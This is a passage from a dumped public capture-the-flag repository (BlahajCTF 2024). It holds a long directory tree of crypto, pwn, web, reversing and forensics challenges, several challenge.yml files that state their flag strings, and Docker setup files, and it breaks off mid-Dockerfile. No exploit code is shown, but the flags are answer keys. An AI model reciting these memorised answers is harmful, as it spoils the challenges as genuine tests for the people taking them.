├── .gitignore ├── Challenges ├── Crypto │ ├── EZpz │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── main.sage │ │ ├── sol │ │ │ └── solve.sage │ │ └── src │ │ │ └── main.sage │ ├── OneShot │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── OneShot.py │ │ ├── sol │ │ │ ├── solution.md │ │ │ ├── solver.py │ │ │ └── symbolic_mersenne_cracker.py │ │ └── src │ │ │ ├── Dockerfile │ │ │ └── server.py │ ├── README.md │ ├── beginner_lcg │ │ ├── dist │ │ │ └── chal.py │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── chal.py │ │ │ └── docker-compose.yml │ ├── beginner_rc4 │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── chall.py │ │ └── sol │ │ │ └── sol.py │ ├── beginner_rsa │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── chall.py │ │ └── sol │ │ │ └── sol.py │ ├── bytes2long │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── chall.py │ │ └── sol │ │ │ └── sol.py │ ├── cycloLCG │ │ ├── dist │ │ │ └── chal.py │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── chal.py │ │ │ └── docker-compose.yml │ ├── ecdsa_jail │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── Dockerfile │ │ │ ├── chal.py │ │ │ └── flag.txt │ │ ├── sol │ │ │ └── image.png │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── chal.py │ │ │ └── flag.txt │ ├── gggg │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── chall.py │ │ │ └── out.sobj │ │ ├── sol │ │ │ └── sol.py │ │ └── src │ │ │ └── gen.py │ ├── long2bytes │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── chall.py │ │ └── sol │ │ │ └── sol.py │ ├── otp │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── chal.py │ │ ├── solution.md │ │ ├── solve │ │ │ └── soln.py │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── chal.py │ │ │ ├── docker-compose.yml │ │ │ └── entry.sh │ ├── pascal │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── chall.py │ │ ├── sol │ │ │ └── sol.py │ │ └── src │ │ │ └── flag.txt │ └── ycloLC │ │ ├── dist │ │ └── chal.py │ │ └── src │ │ ├── Dockerfile │ │ ├── chal.py │ │ └── docker-compose.yml ├── EXAMPLES │ ├── Executable Challenge │ │ └── christmas │ │ │ ├── challenge.yml │ │ │ ├── dist │ │ │ ├── libc.so.6 │ │ │ 
└── santa │ │ │ ├── sol │ │ │ ├── libc.so.6 │ │ │ ├── santa_patched │ │ │ └── solve.py │ │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── flag.txt │ │ │ ├── libc.so.6 │ │ │ ├── santa │ │ │ └── santa.c │ ├── Interactive Challenge │ │ └── Printwriter -1 │ │ │ ├── challenge.yml │ │ │ ├── dist │ │ │ └── main.py │ │ │ ├── sol │ │ │ └── solution.md │ │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── flag.txt │ │ │ └── main.py │ └── Server Challenge │ │ └── eXample Sending Service │ │ ├── challenge.yml │ │ ├── dist │ │ ├── Dockerfile │ │ ├── admin │ │ │ └── admin.js │ │ ├── app.js │ │ ├── flag.txt │ │ ├── package-lock.json │ │ ├── package.json │ │ └── views │ │ │ ├── index.ejs │ │ │ └── view_message.ejs │ │ ├── sol │ │ └── solution.md │ │ └── src │ │ ├── Dockerfile │ │ ├── admin │ │ └── admin.js │ │ ├── app.js │ │ ├── flag.txt │ │ ├── package-lock.json │ │ ├── package.json │ │ └── views │ │ ├── index.ejs │ │ └── view_message.ejs ├── Forensics │ ├── README.md │ ├── audiofile │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── chal.wav │ │ └── solution.md │ ├── bigzip │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── chal.zip │ │ ├── solution.md │ │ └── solution │ │ │ └── soln.py │ ├── corruptedimage │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── fix_me.jpg │ │ ├── solution.md │ │ └── solution │ │ │ └── untitled.png │ ├── dataexpunged │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── exfiltrated.pdf │ │ └── solution.md │ ├── imetthedata │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── flag.jpg │ │ └── solution.md │ ├── keylogger │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── log.pcapng │ │ └── solution.md │ ├── memory │ │ ├── challenge.yml │ │ └── solution.md │ ├── significantbites │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── bad_apple.PNG │ │ └── solution.md │ ├── trashcanstroll │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── silly.jpg │ │ └── solution.md │ └── wireshonk │ │ ├── challenge.yml │ │ └── solution.md ├── Misc │ ├── 1110101111011010 │ │ ├── challenege.yml │ │ ├── dist │ │ │ 
└── secret.wav │ │ ├── sol.md │ │ ├── solve │ │ │ └── solve.py │ │ └── src │ │ │ └── encoder.py │ ├── README.md │ ├── Shikanoko │ │ ├── README.md │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── .gitignore │ │ │ ├── README.md │ │ │ ├── next.config.mjs │ │ │ ├── package-lock.json │ │ │ ├── package.json │ │ │ ├── public │ │ │ │ ├── favicon.ico │ │ │ │ ├── next.svg │ │ │ │ ├── thumbnail.png │ │ │ │ └── vercel.svg │ │ │ ├── src │ │ │ │ └── app │ │ │ │ │ ├── components │ │ │ │ │ ├── Footer.tsx │ │ │ │ │ ├── MarkovChain.css │ │ │ │ │ └── MarkovChain.tsx │ │ │ │ │ ├── layout.tsx │ │ │ │ │ ├── page.tsx │ │ │ │ │ └── styles │ │ │ │ │ └── globals.css │ │ │ └── tsconfig.json │ │ ├── sol │ │ │ ├── index.js │ │ │ ├── package-lock.json │ │ │ └── package.json │ │ └── src │ │ │ ├── .gitignore │ │ │ ├── Dockerfile │ │ │ ├── README.md │ │ │ ├── docker-compose.yml │ │ │ ├── next.config.mjs │ │ │ ├── package-lock.json │ │ │ ├── package.json │ │ │ ├── public │ │ │ ├── favicon.ico │ │ │ ├── next.svg │ │ │ ├── thumbnail.png │ │ │ └── vercel.svg │ │ │ ├── src │ │ │ └── app │ │ │ │ ├── components │ │ │ │ ├── Footer.tsx │ │ │ │ ├── MarkovChain.css │ │ │ │ └── MarkovChain.tsx │ │ │ │ ├── layout.tsx │ │ │ │ ├── page.tsx │ │ │ │ └── styles │ │ │ │ └── globals.css │ │ │ └── tsconfig.json │ ├── castingspells │ │ ├── challenge.yml │ │ ├── solution.md │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── entry.sh │ │ │ └── main.py │ ├── jigsawpuzzle │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── jigsaw.py │ │ │ └── puzzle.png │ │ └── sol │ │ │ ├── part1.png │ │ │ ├── part1.py │ │ │ ├── solve.md │ │ │ └── solve.py │ ├── modelanswer │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── ai.h5 │ │ │ └── server.py │ │ ├── solution.md │ │ ├── solve │ │ │ ├── ai.h5 │ │ │ └── soln.py │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── ai.h5 │ │ │ ├── chal.py │ │ │ ├── docker-compose.yml │ │ │ ├── entry.sh │ │ │ └── requirements.txt │ ├── modelanswer2 │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── models.zip │ │ │ 
└── trainer.py │ │ ├── soln │ │ │ └── solution.py │ │ └── solution.md │ ├── one_call_away │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── jail.py │ │ ├── solution.md │ │ ├── solve │ │ │ └── s.py │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── entry.sh │ │ │ ├── flag.txt │ │ │ └── jail.py │ ├── scanme │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── image.png │ │ └── solution.md │ └── shellcraft_shenanigans │ │ ├── challenge.yml │ │ ├── dist │ │ └── chall │ │ ├── sol.md │ │ ├── solve │ │ └── solve.py │ │ └── src │ │ ├── Dockerfile │ │ ├── chall │ │ ├── chall.c │ │ ├── docker-compose.yml │ │ └── flag.txt ├── Osint │ ├── README.md │ ├── bad coder │ │ ├── challenge.yml │ │ └── solution.md │ └── mrt │ │ ├── challenge.yml │ │ └── dist │ │ └── mrt.jpg ├── Pwn │ ├── 2wrongsDontMakeARight │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── ld-linux-x86-64.so.2 │ │ │ ├── libc.so.6 │ │ │ └── vuln │ │ ├── irrelevant │ │ │ ├── vuln │ │ │ └── vuln.c │ │ ├── solve │ │ │ └── exploit.py │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── buildx │ │ │ ├── docker-compose.yml │ │ │ ├── flag.txt │ │ │ ├── ld-linux-x86-64.so.2 │ │ │ ├── libc.so.6 │ │ │ └── vuln │ ├── Feedback Simulator │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── ld-linux-x86-64.so.2 │ │ │ ├── libc.so.6 │ │ │ └── program │ │ ├── solve │ │ │ └── solve.py │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── flag.txt │ │ │ ├── ld-linux-x86-64.so.2 │ │ │ ├── libc.so.6 │ │ │ └── program │ ├── README.md │ ├── babycpp │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── chal │ │ │ └── chal.cpp │ │ ├── solution.md │ │ ├── solve │ │ │ ├── chal │ │ │ └── soln.py │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── chal │ │ │ ├── chal.cpp │ │ │ ├── docker-compose.yml │ │ │ └── entry.sh │ ├── babyoverflow │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── chal │ │ │ └── chal.c │ │ ├── solution.md │ │ ├── solve │ │ │ ├── chal │ │ │ └── soln.py │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── chal │ │ │ ├── chal.c │ │ │ ├── docker-compose.yml │ │ │ └── entry.sh │ ├── 
enotes │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── enotes │ │ │ ├── enotes.c │ │ │ ├── ld-linux-x86-64.so.2 │ │ │ └── libc.so.6 │ │ ├── soln │ │ │ ├── enotes │ │ │ ├── libc.so.6 │ │ │ └── soln.py │ │ ├── solution.md │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── app.py │ │ │ ├── docker-compose.yml │ │ │ ├── enotes │ │ │ ├── enotes.c │ │ │ ├── flag.txt │ │ │ ├── ld-linux-x86-64.so.2 │ │ │ └── libc.so.6 │ ├── notepad │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── chal │ │ │ └── chal.c │ │ ├── solution.md │ │ ├── solve │ │ │ ├── chal │ │ │ └── sol.py │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── chal │ │ │ ├── chal.c │ │ │ ├── docker-compose.yml │ │ │ ├── entry.sh │ │ │ └── flag.txt │ ├── notepad2 │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── chal │ │ │ ├── chal.c │ │ │ ├── ld-linux-x86-64.so.2 │ │ │ └── libc.so.6 │ │ ├── solution.md │ │ ├── solve │ │ │ ├── chal │ │ │ └── soln.py │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── chal │ │ │ ├── chal.c │ │ │ ├── docker-compose.yml │ │ │ ├── entry.sh │ │ │ ├── flag.txt │ │ │ ├── ld-linux-x86-64.so.2 │ │ │ └── libc.so.6 │ ├── onewrite │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── chal │ │ │ ├── chal.c │ │ │ ├── ld-linux-x86-64.so.2 │ │ │ └── libc.so.6 │ │ ├── solution.md │ │ ├── solve │ │ │ ├── chal │ │ │ ├── chal.c │ │ │ ├── ld-linux-x86-64.so.2 │ │ │ ├── libc.so.6 │ │ │ └── soln.py │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── chal │ │ │ ├── docker-compose.yml │ │ │ ├── entry.sh │ │ │ ├── flag.txt │ │ │ ├── ld-linux-x86-64.so.2 │ │ │ └── libc.so.6 │ ├── password │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── chal │ │ │ └── chal.c │ │ ├── solution.md │ │ ├── solve │ │ │ ├── chal │ │ │ └── soln.py │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── chal │ │ │ ├── chal.c │ │ │ ├── docker-compose.yml │ │ │ ├── entry.sh │ │ │ └── flag.txt │ ├── pwn100 │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── chal │ │ │ └── chal.c │ │ ├── solution.md │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── chal │ │ │ ├── chal.c │ │ │ ├── docker-compose.yml │ │ │ └── entry.sh │ ├── 
pwn101 │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── chal │ │ │ └── chal.c │ │ ├── solution.md │ │ ├── solve │ │ │ ├── chal │ │ │ └── soln.py │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── chal │ │ │ ├── chal.c │ │ │ ├── docker-compose.yml │ │ │ └── entry.sh │ ├── pwn201 │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── chal │ │ │ └── chal.c │ │ ├── solution.md │ │ ├── solve │ │ │ ├── chal │ │ │ └── soln.py │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── chal │ │ │ ├── chal.c │ │ │ ├── docker-compose.yml │ │ │ ├── entry.sh │ │ │ └── flag.txt │ └── speed │ │ ├── challenge.yml │ │ ├── soln │ │ └── auto.py │ │ ├── solution.md │ │ └── src │ │ ├── Dockerfile │ │ ├── app.py │ │ ├── docker-compose.yml │ │ └── requirements.txt ├── README.md ├── Rev │ ├── README.md │ ├── areyouarobot │ │ ├── challenge.yml │ │ ├── solution.md │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── bg.png │ │ │ ├── captcha.ps1 │ │ │ ├── docker-compose.yml │ │ │ ├── favicon.ico │ │ │ ├── index.html │ │ │ └── logo.png │ ├── assembly │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── challenge.s │ │ └── solution.md │ ├── badbreaking │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── breaking │ │ └── solution.md │ ├── blahajcryptor │ │ ├── challenge.yml │ │ ├── sol.md │ │ └── src │ │ │ ├── 3Ff3i1QcR3WacYRgj2hmmqkdUykWRqFCKxY3QtDL8ET7.exe │ │ │ ├── 5nhEj7fnwcBvrMbm8RdeJoiWo28isUqL7BhS4bRneB1m.exe │ │ │ ├── 7cgjCgUBZzcggXtLpwxY7ek2PD9dy8Y3ymEuFobwyTsh.exe │ │ │ ├── B7HBaDA3US8dDNZ34icgNWnpBYZJvciqJp1hy8f9G6zF.exe │ │ │ ├── Dockerfile │ │ │ ├── G8KZoPuDgADZSyzNZn9TfUJqHM3xokdQ5ZN6yd3chJ9T.exe │ │ │ ├── README.md │ │ │ ├── docker-compose.yml │ │ │ ├── eLo8wXAbf8LJZxSTy8tTonPQx76L6edq1xj4KrgPGYj.exe │ │ │ ├── entry.sh │ │ │ ├── main.py │ │ │ └── nG9EwmiYqaCEbntFkrMLgUpYCzND2tVDGzPR5XRfJbs.exe │ ├── blahajos │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── boot.asm │ │ │ └── os.img │ │ └── solution.md │ ├── clubclassics │ │ ├── challenge.yml │ │ ├── solution.md │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── index.html │ 
│ │ ├── module.js │ │ │ └── module.wasm │ ├── covfefe │ │ ├── challenge.yml │ │ └── dist │ │ │ └── Covfefe.jar │ ├── crackme2 │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── crackme2 │ │ └── solution.md │ ├── funnycats │ │ ├── challenge.yml │ │ ├── dist │ │ │ ├── .gitignore │ │ │ ├── funny_cat_1.bmp │ │ │ ├── funny_cat_2.bmp │ │ │ ├── funny_cat_3.bmp │ │ │ └── main │ │ └── solution.md │ ├── iloveyou │ │ ├── challenge.yml │ │ └── dist │ │ │ └── LOVE_LETTER_FOR_YOU.doc │ ├── lookma │ │ ├── challenge.yml │ │ └── dist │ │ │ └── challenge.py │ ├── powerfulshell │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── chal.ps1 │ │ └── solution.md │ ├── smuay │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── smuay │ │ └── sol │ │ │ └── smuay.i64 │ ├── timeandplace │ │ ├── challenge.yml │ │ ├── dist │ │ │ └── dist.zip │ │ └── solution.md │ └── unsafepdf │ │ ├── challenge.yml │ │ └── dist │ │ └── silly_document.pdf └── Web │ ├── README.md │ ├── SSTIgolf │ ├── challenge.yml │ ├── dist │ │ └── dist.zip │ ├── sol.md │ ├── solve │ │ └── solve.py │ └── src │ │ ├── Dockerfile │ │ ├── app.py │ │ ├── docker-compose.yml │ │ ├── flag.txt │ │ ├── requirements.txt │ │ ├── static │ │ └── images │ │ │ └── golf.jpg │ │ └── templates │ │ └── index.html │ ├── babysql │ ├── challenge.yml │ ├── sol.md │ └── src │ │ ├── Dockerfile │ │ ├── app.py │ │ ├── database.db │ │ ├── docker-compose.yml │ │ ├── init_db.py │ │ ├── requirements.txt │ │ ├── schema.sql │ │ ├── static │ │ └── css │ │ │ └── style.css │ │ └── templates │ │ ├── admin.html │ │ ├── adminlogin.html │ │ ├── index.html │ │ ├── login.html │ │ ├── product.html │ │ ├── register.html │ │ └── user.html │ ├── babyssti │ ├── challenge.yml │ ├── solution.md │ └── src │ │ ├── Dockerfile │ │ ├── app.py │ │ ├── docker-compose.yml │ │ ├── flag.txt │ │ ├── requirements.txt │ │ └── templates │ │ └── index.html │ ├── calculator │ ├── challenge.yml │ ├── solution.md │ └── src │ │ ├── Dockerfile │ │ ├── app.py │ │ ├── docker-compose.yml │ │ ├── requirements.txt │ │ └── 
templates │ │ ├── bug_report.html │ │ ├── index.html │ │ └── result.html │ ├── compressor │ ├── challenge.yml │ ├── soln │ │ └── soln.py │ ├── solution.md │ └── src │ │ ├── Dockerfile │ │ ├── app.py │ │ ├── docker-compose.yml │ │ ├── index.htm │ │ ├── requirements.txt │ │ └── secretflag.txt │ ├── fanpage │ ├── challenge.yml │ ├── solution.md │ └── src │ │ ├── Dockerfile │ │ ├── app.py │ │ ├── docker-compose.yml │ │ └── requirements.txt │ ├── insecurecontent │ ├── challenge.yml │ ├── dist │ │ ├── admin.js │ │ └── app.py │ ├── sol.md │ └── src │ │ ├── Dockerfile │ │ ├── admin.js │ │ ├── app.py │ │ ├── docker-compose.yml │ │ ├── package-lock.json │ │ ├── package.json │ │ └── requirements.txt │ ├── johndoe │ ├── challenge.yml │ ├── solution.md │ └── src │ │ ├── Dockerfile │ │ ├── app.py │ │ ├── docker-compose.yml │ │ └── requirements.txt │ ├── pkiller │ ├── challenge.yml │ ├── dist │ │ └── chal.php │ ├── soln │ │ └── soln.php │ ├── solution.md │ └── src │ │ ├── Dockerfile │ │ ├── docker-compose.yml │ │ └── src │ │ ├── .htaccess │ │ ├── 000-default.conf │ │ ├── flag.txt │ │ ├── index.php │ │ └── ports.conf │ ├── screenshooter │ ├── challenge.yml │ ├── dist │ │ ├── app.py │ │ └── requirements.txt │ ├── soln │ │ └── soln.py │ ├── solution.md │ └── src │ │ ├── Dockerfile │ │ ├── app.py │ │ ├── docker-compose.yml │ │ ├── flags │ │ ├── fakeflag1.txt │ │ ├── fakeflag10.txt │ │ ├── fakeflag100.txt │ │ ├── fakeflag11.txt │ │ ├── fakeflag12.txt │ │ ├── fakeflag13.txt │ │ ├── fakeflag14.txt │ │ ├── fakeflag15.txt │ │ ├── fakeflag16.txt │ │ ├── fakeflag17.txt │ │ ├── fakeflag18.txt │ │ ├── fakeflag19.txt │ │ ├── fakeflag2.txt │ │ ├── fakeflag20.txt │ │ ├── fakeflag21.txt │ │ ├── fakeflag22.txt │ │ ├── fakeflag23.txt │ │ ├── fakeflag24.txt │ │ ├── fakeflag25.txt │ │ ├── fakeflag26.txt │ │ ├── fakeflag27.txt │ │ ├── fakeflag28.txt │ │ ├── fakeflag29.txt │ │ ├── fakeflag3.txt │ │ ├── fakeflag30.txt │ │ ├── fakeflag31.txt │ │ ├── fakeflag32.txt │ │ ├── fakeflag33.txt │ │ ├── 
fakeflag34.txt │ │ ├── fakeflag35.txt │ │ ├── fakeflag36.txt │ │ ├── fakeflag37.txt │ │ ├── fakeflag38.txt │ │ ├── fakeflag39.txt │ │ ├── fakeflag4.txt │ │ ├── fakeflag40.txt │ │ ├── fakeflag41.txt │ │ ├── fakeflag42.txt │ │ ├── fakeflag43.txt │ │ ├── fakeflag44.txt │ │ ├── fakeflag45.txt │ │ ├── fakeflag46.txt │ │ ├── fakeflag47.txt │ │ ├── fakeflag48.txt │ │ ├── fakeflag49.txt │ │ ├── fakeflag5.txt │ │ ├── fakeflag50.txt │ │ ├── fakeflag51.txt │ │ ├── fakeflag52.txt │ │ ├── fakeflag53.txt │ │ ├── fakeflag54.txt │ │ ├── fakeflag55.txt │ │ ├── fakeflag56.txt │ │ ├── fakeflag57.txt │ │ ├── fakeflag58.txt │ │ ├── fakeflag59.txt │ │ ├── fakeflag6.txt │ │ ├── fakeflag60.txt │ │ ├── fakeflag61.txt │ │ ├── fakeflag62.txt │ │ ├── fakeflag63.txt │ │ ├── fakeflag64.txt │ │ ├── fakeflag65.txt │ │ ├── fakeflag66.txt │ │ ├── fakeflag67.txt │ │ ├── fakeflag68.txt │ │ ├── fakeflag69.txt │ │ ├── fakeflag7.txt │ │ ├── fakeflag70.txt │ │ ├── fakeflag71.txt │ │ ├── fakeflag72.txt │ │ ├── fakeflag73.txt │ │ ├── fakeflag74.txt │ │ ├── fakeflag75.txt │ │ ├── fakeflag76.txt │ │ ├── fakeflag77.txt │ │ ├── fakeflag78.txt │ │ ├── fakeflag79.txt │ │ ├── fakeflag8.txt │ │ ├── fakeflag80.txt │ │ ├── fakeflag81.txt │ │ ├── fakeflag82.txt │ │ ├── fakeflag83.txt │ │ ├── fakeflag84.txt │ │ ├── fakeflag85.txt │ │ ├── fakeflag86.txt │ │ ├── fakeflag87.txt │ │ ├── fakeflag88.txt │ │ ├── fakeflag89.txt │ │ ├── fakeflag9.txt │ │ ├── fakeflag90.txt │ │ ├── fakeflag91.txt │ │ ├── fakeflag92.txt │ │ ├── fakeflag93.txt │ │ ├── fakeflag94.txt │ │ ├── fakeflag95.txt │ │ ├── fakeflag96.txt │ │ ├── fakeflag97.txt │ │ ├── fakeflag98.txt │ │ ├── fakeflag99.txt │ │ └── theactuallyrealflag │ │ ├── requirements.txt │ │ └── templates │ │ └── index.html │ ├── securecontent │ ├── challenge.yml │ ├── dist │ │ └── app.py │ ├── solution.md │ └── src │ │ ├── Dockerfile │ │ ├── app.py │ │ ├── docker-compose.yml │ │ └── requirements.txt │ ├── shark-lotto │ ├── Dockerfile │ ├── main.py │ ├── requirements.txt │ ├── static │ 
│ ├── blahaj.jpg │ │ ├── djungelskog.avif │ │ ├── ikea.png │ │ └── neon-cat-cute.gif │ └── templates │ │ └── slots.html │ └── userman │ ├── challenge.yml │ ├── dist │ └── chal.php │ ├── solution.md │ └── src │ ├── Dockerfile │ ├── docker-compose.yml │ └── src │ ├── .htaccess │ ├── 000-default.conf │ ├── index.php │ └── ports.conf ├── LICENSE.md └── README.md /Challenges/Crypto/EZpz/challenge.yml: -------------------------------------------------------------------------------- 1 | name: EZpz 2 | author: azazo 3 | category: crypto 4 | description: | 5 | > Seems that there were lot of smart people around last year... Well then, this challenge shouldn't be a problem, since it's EZpz. 6 | 7 | flags: 8 | - blahaj{3x73nd3D_an0Mal0u5_cURV3_a77ACK_0n_F13LD_0F_P-aD1c_nUMb3r5} -------------------------------------------------------------------------------- /Challenges/Crypto/OneShot/challenge.yml: -------------------------------------------------------------------------------- 1 | name: OneShot 2 | author: OwOverflow! 3 | category: crypto 4 | description: | 5 | > The glitch is spreading across the world, corrupting the bits needed to decrypt the key. The world machine needs your help! 
6 | 7 | # The flag to use 8 | flags: 9 | - blahaj{N1K0_02_N1C0_807H_423_CU73_N4M35} -------------------------------------------------------------------------------- /Challenges/Crypto/OneShot/sol/solution.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Crypto/OneShot/sol/solution.md -------------------------------------------------------------------------------- /Challenges/Crypto/OneShot/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.8-alpine 3 | 4 | # switch working directory 5 | WORKDIR /app 6 | 7 | # copy every content from the local file to the image 8 | COPY . /app 9 | 10 | EXPOSE 8000 11 | 12 | # configure the container to run in an executed manner 13 | ENTRYPOINT [ "python" ] 14 | 15 | CMD [ "server.py" ] 16 | -------------------------------------------------------------------------------- /Challenges/Crypto/README.md: -------------------------------------------------------------------------------- 1 | Crypto Challenges -------------------------------------------------------------------------------- /Challenges/Crypto/beginner_lcg/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.10-alpine 3 | 4 | RUN apk update && apk add socat 5 | 6 | RUN pip install pycryptodome 7 | 8 | COPY ./chal.py /srv/app/run.py 9 | RUN chmod 555 /srv/app/run.py 10 | 11 | WORKDIR /srv/app 12 | 13 | CMD [ "socat", "TCP-LISTEN:8000,nodelay,reuseaddr,fork", "EXEC:\"timeout -s KILL 10m python3.10 -u /srv/app/run.py\"" ] -------------------------------------------------------------------------------- /Challenges/Crypto/beginner_lcg/src/docker-compose.yml: 
-------------------------------------------------------------------------------- 1 | services: 2 | beginner-lcg: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Crypto/beginner_rc4/challenge.yml: -------------------------------------------------------------------------------- 1 | name: beginner_stream 2 | author: warri 3 | category: crypto 4 | description: 5 | I was inspired by the internals of RC4 and made this custom stream cipher! 6 | This challenge has added comments to help ease one into the world of slightly harder cryptos! 7 | 8 | flags: 9 | - blahaj{d0nt_m4k3_y0ur_st4te_4a5y_t0_r3c0ver!} -------------------------------------------------------------------------------- /Challenges/Crypto/beginner_rsa/challenge.yml: -------------------------------------------------------------------------------- 1 | name: beginner_rsa 2 | author: warri 3 | category: crypto 4 | description: RSA is hard when the factorisation of n is unknown. Would this be enough to break it? 5 | 6 | flags: 7 | - blahaj{eqns_and_rsa_make_a_fine_couple} -------------------------------------------------------------------------------- /Challenges/Crypto/bytes2long/challenge.yml: -------------------------------------------------------------------------------- 1 | name: bytes2long 2 | author: warri 3 | category: crypto 4 | description: Let's start off with simple bytes to int conversion! 
Follow the instructions in the file to get the flag 5 | 6 | flags: 7 | - blahaj{h3llo_crypt0!} -------------------------------------------------------------------------------- /Challenges/Crypto/cycloLCG/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.10-alpine 3 | 4 | RUN apk update && apk add socat 5 | 6 | RUN pip install pycryptodome 7 | 8 | COPY ./chal.py /srv/app/run.py 9 | RUN chmod 555 /srv/app/run.py 10 | 11 | WORKDIR /srv/app 12 | 13 | CMD [ "socat", "TCP-LISTEN:8000,nodelay,reuseaddr,fork", "EXEC:\"timeout -s KILL 10m python3.10 -u /srv/app/run.py\"" ] -------------------------------------------------------------------------------- /Challenges/Crypto/cycloLCG/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | cyclolcg: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Crypto/ecdsa_jail/challenge.yml: -------------------------------------------------------------------------------- 1 | name: ecdsa_jail 2 | author: warri 3 | category: crypto 4 | description: I heard jails are tough to protect, so I wrote an ECDSA algorithm such that any input code must be signed with my own private key in order for them to be executed! I heard there's a nasty CVE-2022-21449 vulnerability concerning input validation, so I made a quick patch to it! It should be secure now, right? 
5 | 6 | flags: 7 | - blahaj{CVE-2022-21449_psYch1c_sigNatur3s!} -------------------------------------------------------------------------------- /Challenges/Crypto/ecdsa_jail/dist/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.10-alpine 3 | 4 | RUN apk update && apk add python3-dev gcc musl-dev gmp-dev socat 5 | RUN pip install fastecdsa 6 | 7 | COPY ./chal.py /srv/app/run.py 8 | COPY ./flag.txt /srv/app/flag.txt 9 | RUN chmod 555 /srv/app/run.py 10 | 11 | WORKDIR /srv/app 12 | 13 | CMD [ "socat", "TCP-LISTEN:8000,nodelay,reuseaddr,fork", "EXEC:\"timeout -s KILL 10m python3.10 -u /srv/app/run.py\"" ] 14 | # docker build -t ecdsa_jail -------------------------------------------------------------------------------- /Challenges/Crypto/ecdsa_jail/dist/flag.txt: -------------------------------------------------------------------------------- 1 | enterflagdatahere -------------------------------------------------------------------------------- /Challenges/Crypto/ecdsa_jail/sol/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Crypto/ecdsa_jail/sol/image.png -------------------------------------------------------------------------------- /Challenges/Crypto/ecdsa_jail/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.10-alpine 3 | 4 | RUN apk update && apk add python3-dev gcc musl-dev gmp-dev socat 5 | RUN pip install fastecdsa 6 | 7 | COPY ./chal.py /srv/app/run.py 8 | COPY ./flag.txt /srv/app/flag.txt 9 | RUN chmod 555 /srv/app/run.py 10 | 11 | WORKDIR /srv/app 12 | 13 | CMD [ "socat", "TCP-LISTEN:8000,nodelay,reuseaddr,fork", 